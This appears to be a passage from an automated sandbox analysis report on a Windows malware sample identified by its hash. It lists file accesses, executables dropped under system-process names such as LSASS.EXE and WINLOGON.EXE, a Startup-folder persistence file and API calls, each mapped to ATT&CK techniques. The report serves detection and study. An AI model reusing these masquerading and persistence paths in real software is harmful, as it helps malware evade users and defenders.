\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe.cfg\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe.cfg\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe.Local\\\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\lsass.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\winlogon.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\d3_08.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" reads file \"c:\\users\\desktop.ini\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" reads file \"c:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 6008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\winlogon.exe\" (UID: 6008)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 5948)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 5948)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 2452)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 2452)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 3996)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 3996)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00000952]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000952]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000952]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00006008]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000952]\n \"D3_08.EXE.67EE4BB1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4667.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000952]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000952]\n \"D3_08.EXE.67EE4665.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00000952]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000952]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000952]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\PuRn4m4.txt]- [targetUID: 00000000-00000952]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: 00000000-00000952]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000952]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00000952]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4BB3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"D3_08.EXE.67EE4D76.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"IEXPLORER.EXE.67EE4D7B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00000952]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005948)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004240)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00002952)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00002952)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00002952)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004068)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004372)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004364)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000003828650068da1200b3446f6c81d06076000000000000000000000000000000000000000000000000100100000000000000000000000000006ee051cb85f81ec824df12005ecb5e761001000000000000005d5c7680e112000e5d5c7618dd1200dcaa6076010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c3e051cbf8da12006d828c775c43640004010000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000630065003300650063003900620030003900370035003000350038003100340032003300310003000000000000000200000080236600404c6300286d61003200020001000000f40100000a0000000000000000000000484c6300c201000009000000f0716100050000000000000032000000602b6600a0c51200cc417c778023660028000000fc000000ff2b7b772e42bd77d8eb3d77ac0161000000610031000700010000000000ffff95010000040000000100000032000200010000009401610002000000000000000000000038706100f8070000200000000000000000000000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000670001000000ffffffff02000000080000007801660078016600730166000000000002000000b88f630000000000010000080000000068ec120095e17777a695d400feffffffe0d912003f084d7602000000b88f6300000000000100001888fb4c76d0d91200c81c6076a6db120095fb4c7604db1200b88f63000000000000000000000000008cda120088fb4c767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360037e051cb4cda12006d828c775c43640004010000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036005fe951cb64d312006d828c775c43640004010000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000040cd6500b8cf1200b3446f6c81d0607600000000000000000000000000000000000000000000000078010000000000000000000000000000bef551cbf5ed1ec874d412005ecb5e767801000000000000005d5c76d0d612000e5d5c7668d21200dcaa607601000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360033ea51cb48d012006d828c77ac47640004010000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006700003b00000000610000000000d8aa6700accf120004647b7738016100e0637b7702000000b88f63000000000001000008a695d400feffffffbcc78377c0c783770a00000030cf12003f084d7602000000b88f6300000000000100001888fb4c7620cf1200c81c6076f6d0120095fb4c7654d01200b88f6300000000000000000000000000dccf120088fb4c767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360067f551cb9ccf12006d828c77ac47640004010000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a0080a76a007ba76a0000000000000000000000610000000001e4cb12000000000048d9120095e17777a695d400feffffff435c7b7750597b77aa000000b80000007aa76a0078a76a006ccd1200a4d1120000000000000000000000000000000000000000000000000000000000000000001c5c7a7760d87c75ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096ed7b77a2a76a00a06a5175860000006ccd1200a4d112000000000086008800a06a51756ccd1200916c5175a2a76a00a06a5175a06a5175dcd1120002020000 (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006008)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f0154701eea3a072001647010200000088962400609ba0720c1647017d9ba072328a9a7214e2250097a8a0720200000000000000c8e12500889624000816470194f9120094f912003ff29872f0154701c3a5a0720016470188962400c0e59672c8e1250034000000d01b470100004401e02f4701c0e59672d8f91200dcf91200000000004e0200009cfa1200340000003400000017687b77d81b470100000000435c7b77e468bd770016470124034401000044015001440193aba07200000000c06d44015c15470100000000889624004e02000000fa120050014401b7aba072 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 